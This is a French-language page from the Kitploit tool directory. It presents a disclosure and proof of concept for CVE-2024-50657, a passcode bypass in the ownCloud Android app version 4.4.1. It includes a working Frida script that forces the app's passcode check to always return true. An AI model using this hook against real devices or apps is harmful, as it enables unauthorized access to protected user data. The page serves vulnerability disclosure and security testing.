Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-50657 — Fournit une preuve de concept pour CVE-2024-50657, une vulnérabilité de contrôle d'accès incorrect dans l'application Owncloud Android, démontrant le contournement du code d'accès via le hooking Frida. | Kitploit
Outils/GitHubGitHub/sahalll/cve-2024-50657
Sécurité AndroidAnalyse des VulnérabilitésExploitationTests d'IntrusionSécurité Mobile
GitHubsahalll/cve-2024-50657

CVE-2024-50657

Fournit une preuve de concept pour CVE-2024-50657, une vulnérabilité de contrôle d'accès incorrect dans l'application Owncloud Android, démontrant le contournement du code d'accès via le hooking Frida.

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-50657:Contrôle d'accès incorrect sur l'APK Owncloud

Un problème dans l'APK Android Owncloud v.4.4.1 permet à un attaquant physiquement proche d'élever ses privilèges via la classe PassCodeViewModel, plus précisément dans la méthode checkPassCodeIsValid.

Type de vulnérabilité

Contrôle d'accès incorrect

Fournisseur du produit

Owncloud

Code de base du produit affecté

APK Android Owncloud - 4.4.1

Composant affecté

com.owncloud.android.presentation.security.passcode.PassCodeViewModel

Exploitation

Identifier la classe et la méthode cibles :

La classe PassCodeViewModel dans l'application gère la logique de vérification du code d'accès. La méthode checkPassCodeIsValid au sein de cette classe est responsable de la détermination de la validité du code d'accès saisi.

Intercepter la méthode à l'aide de Frida :

Un script Frida est utilisé pour intercepter la méthode checkPassCodeIsValid dans la classe PassCodeViewModel. L'implémentation de la méthode est modifiée pour toujours retourner true, contournant ainsi la validation réelle du code d'accès.

Exécution :

Le script Frida est exécuté pendant que l'application est en cours d'exécution. Tout code d'accès saisi par l'utilisateur sera accepté comme valide, permettant un accès non autorisé.

Preuve de concept (PoC)

Java.perform(function() { // Locate the PassCodeViewModel class in the target application var PassCodeActivity = Java.use('com.owncloud.android.presentation.security.passcode.PassCodeViewModel');

// Hook the checkPassCodeIsValid method to modify its behavior PassCodeActivity.checkPassCodeIsValid.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true return true;

};

});

Lien vidéo de la PoC : https://drive.google.com/drive/folders/1C-ZYjYhmKRGvWs9YN51XOiAS2WxxwdQd?usp=sharing

Impact :-

Cette vulnérabilité est une vulnérabilité de contournement de sécurité côté client. Elle affecte les utilisateurs de l'application qui comptent sur la fonctionnalité de code d'accès pour protéger des données sensibles ou restreindre l'accès à certaines fonctionnalités de l'application. En exploitant cette vulnérabilité, un attaquant peut contourner la vérification du code d'accès et obtenir un accès non autorisé à des zones de l'application qui devraient être protégées, exposant potentiellement des données utilisateur ou permettant des actions non autorisées dans l'application.

Télécharger l’outil